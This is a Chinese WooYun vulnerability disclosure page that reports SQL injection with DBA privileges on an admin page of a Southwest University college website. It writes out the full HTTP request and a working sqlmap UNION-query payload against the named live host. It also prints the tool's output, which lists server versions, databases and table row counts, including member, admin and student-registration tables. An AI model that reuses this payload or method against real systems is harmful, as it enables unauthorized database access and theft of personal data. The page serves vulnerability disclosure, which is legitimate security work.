当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0156169
漏洞标题:
西南大学某院SQL注入(DBA权限)
相关厂商:
西南大学
漏洞作者:
路人甲
提交时间:
2015-11-27 10:58
修复时间:
2016-01-11 15:32
公开时间:
2016-01-11 15:32
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
15
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-11-27: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

RT
多处存在注入,多处存在注入,多处存在注入,太多了,举一个。

详细说明:

http://hanhong.swu.edu.cn/  西南大学含弘学院


GET /admin/xuesheng_add.php?id=%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Undefined%20variable:%20id%20in%20%3Cb%3E/opt/lampp/htdocs/admin/xuesheng.php%3C/b%3E%20on%20line%20%3Cb%3E109%3C/b%3E%3Cbr%20/%3E&name=-1&nianfen=2015 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://hanhong.swu.edu.cn
Cookie: PHPSESSID=qg09on74i0001f1l8tlvv64ai7
Host: hanhong.swu.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


name参数存在注入

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=<br /><b>Notice</b>:  Undefined variable: id in <b>/opt/lampp/htdocs/admin/xuesheng.php</b> on line <b>109</b><br />&name=-1' UNION ALL SELECT NULL,CONCAT(0x717a706271,0x434f6671537576784f76565049554f62784a59666853777563714676696467546547447461744b74,0x7171627671),NULL-- -&nianfen=2015
---
web application technology: PHP 5.6.8, Apache 2.4.12
back-end DBMS: MySQL 5.1
current user:    'hanhong@localhost'
current database:    'hanhong'
current user is DBA:    True
available databases [7]:
[*] cdcol
[*] hanhong
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test


根本就是没有防注入,类型有多种,为了快,就选了UNION query

Database: hanhong
+-------------------------------+---------+
| Table                         | Entries |
+-------------------------------+---------+
| common_member_count           | 34117   |
| common_member_status          | 34117   |
| common_member_log             | 34109   |
| ucenter_memberfields          | 31900   |
| common_credit_rule_log        | 26457   |
| forum_statlog                 | 20352   |
| common_onlinetime             | 19901   |
| common_district               | 2677    |
| home_friendlog                | 2616    |
| common_member_verify          | 2293    |
| home_friend                   | 1671    |
| home_pokearchive              | 1498    |
| home_clickuser                | 1310    |
| common_stat                   | 865     |
| forum_post_tableid            | 859     |
| common_credit_rule_log_field  | 822     |
| home_poke                     | 806     |
| home_doing                    | 746     |
| common_member_field_forum     | 556     |
| home_notification             | 540     |
| home_docomment                | 453     |
| home_picfield                 | 452     |
| register_student              | 434     |
| forum_pollvoter               | 393     |
| common_setting                | 350     |
| home_pic                      | 334     |
| xsbmxx                        | 306     |
| forum_polloption              | 272     |
| forum_spacecache              | 272     |
| link                          | 247     |
| home_friend_request           | 241     |
| ucenter_notelist              | 232     |
| forum_debatepost              | 206     |
| home_share                    | 205     |
| common_member_profile         | 182     |
| common_stylevar               | 180     |
| content                       | 179     |
| forum_thread                  | 137     |
| common_member                 | 127     |
| ucenter_members               | 125     |
| forum_postcomment             | 124     |
| home_class                    | 121     |
| home_comment                  | 113     |
| common_member_validate        | 109     |
| common_block_style            | 104     |
| common_syscache               | 88      |
| common_smiley                 | 82      |
| forum_post                    | 76      |
| home_blog                     | 69      |
| common_block                  | 67      |
| common_template_block         | 67      |
| ucenter_pms                   | 67      |
| common_admincp_perm           | 63      |
| common_member_field_home      | 63      |
| forum_poll                    | 63      |
| home_blogfield                | 62      |
| forum_forumfield              | 56      |
| forum_forum                   | 55      |
| forum_attachment              | 52      |
| forum_attachmentfield         | 51      |
| home_feed                     | 50      |
| common_member_profile_setting | 49      |
| common_nav                    | 36      |
| forum_memberrecommend         | 34      |
| common_credit_rule            | 29      |
| forum_modwork                 | 29      |
| home_album                    | 28      |
| common_credit_log             | 26      |
| ucenter_settings              | 25      |
| common_magic                  | 24      |
| home_visitor                  | 21      |
| common_usergroup              | 19      |
| common_usergroup_field        | 19      |
| list                          | 18      |
| forum_moderator               | 17      |
| forum_activity                | 15      |
| forum_activityapply           | 15      |
| home_click                    | 15      |
| common_cron                   | 12      |
| forum_medal                   | 10      |
| home_favorite                 | 10      |
| forum_trade                   | 8       |
| admintea                      | 7       |
| common_admingroup             | 7       |
| forum_postposition            | 7       |
| forum_typeoption              | 6       |
| ucenter_newpm                 | 6       |
| common_admincp_cmenu          | 5       |
| common_admincp_group          | 5       |
| forum_debate                  | 5       |
| common_regip                  | 4       |
| common_style                  | 4       |
| forum_bbcode                  | 4       |
| forum_onlinelist              | 4       |
| forum_grouplevel              | 3       |
| forum_imagetype               | 3       |
| ucenter_admins                | 3       |
| common_admincp_session        | 2       |
| common_friendlink             | 2       |
| common_magiclog               | 2       |
| common_statuser               | 2       |
| common_template               | 2       |
| forum_tradelog                | 2       |
| common_failedlogin            | 1       |
| common_member_verify_info     | 1       |
| common_secquestion            | 1       |
| system                        | 1       |
| ucenter_applications          | 1       |
| ucenter_failedlogins          | 1       |
+-------------------------------+---------+


信息获取基本没难度...
DBA权限,你懂的,

漏洞证明:

修复方案:

最后提醒下,多处SQL

版权声明:转载请注明来源 路人甲@乌云

>

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-11-27 15:12

厂商回复:

已通知责任单位,谢谢!

最新状态:

暂无